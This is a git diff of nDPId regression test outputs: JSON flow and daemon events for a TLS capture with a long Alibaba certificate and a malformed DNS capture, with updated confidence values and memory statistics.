-05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliy
uncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*
.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} 
+00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliy
uncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*
.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} 
00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","packets-captured":47,"packets-processed":47,"total-skipped-flows":0,"total-l4-payload-len":12100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1609756183162} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 47/47 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6268074 bytes -~~ total memory freed........: 6268074 bytes -~~ total allocations/frees...: 118354/118354 +~~ total memory allocated....: 6401708 bytes +~~ total memory freed........: 6401708 bytes +~~ total allocations/frees...: 121116/121116 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 5070 chars diff --git a/test/results/malformed_dns.pcap.out b/test/results/malformed_dns.pcap.out index eacea0f97..c0f5a0eb0 100644 --- a/test/results/malformed_dns.pcap.out +++ b/test/results/malformed_dns.pcap.out 
@@ -2,11 +2,11 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591551760342} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591551760342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1591551760342,"pkt":"AAAAAAAAAAAAAAAACABFAAA4nToAAEAR33h\/AAABfwAAAcUDADUAJP43hLQBAAABAAAAAAAAA3d3dwJ4dANjb20AAAEAAQ=="} 
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
02650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591551760357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1430,"pkt_l4_len":1396,"thread_ts_msec":1591551760357,"pkt":"\/\/\/\/\/\/\/\/AAAAAAAACABFAAWIAAEAAEARd2J\/AAABfwAAAQA1xQMFdLSchLSBAAACAAIAAAAAA3d3dwJ4dANjb20AAAEAASJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBPwAAAAA\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AQD0+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/
Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wEHAQjs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/P8BDwETARcBGNzg5Ojs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AR8BIwEnASsBLwEzATcBOLzAxMjM0NTY3ODk6Ozw9Pj8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wE\/AUMBRwFLAU8BUwFXAVsBXwFjAWcBawFvAXMBdwF4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9PsBfwGDAYcBiwGPAZMBlwGbAZ8BowGnAasBrwGzAbcBuwG\/AcMBxwHLAc8B0wHXAdsB3wHjAecB6wHvAfMB9wH4AAQABwAwAAQABAAAAAAAEQkJCQsAMAAUAAQAAAAAATANBQUE\/MDAwMDEwMDAyMDAxMTAwMTIwMDIxMDAyMjAxMDEwMjAxMTEwMTEyMDEyMTAxMjIwMjAyMTEwMjEyMDIyMTAyBQAAAAAAwP8="} -00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1591551760342,"flow_last_seen":1591551760357,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1416,"flow_avg_l4_payload_len":708,"midstream":0,"thread_ts_msec":1591551760357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":2,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"0.0.0.0"}} 
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1591551760342,"flow_last_seen":1591551760357,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1416,"flow_avg_l4_payload_len":708,"midstream":0,"thread_ts_msec":1591551760357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":2,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"0.0.0.0"}} 02650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591551760372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1430,"pkt_l4_len":1396,"thread_ts_msec":1591551760372,"pkt":"\/\/\/\/\/\/\/\/AAAAAAAACABFAAWIAAEAAEARd2J\/AAABfwAAAQA1xQMFdLSchLSBAAACAAIAAAAAA3d3dwJ4dANjb20AAAEAASJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBPwAAAAA\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/P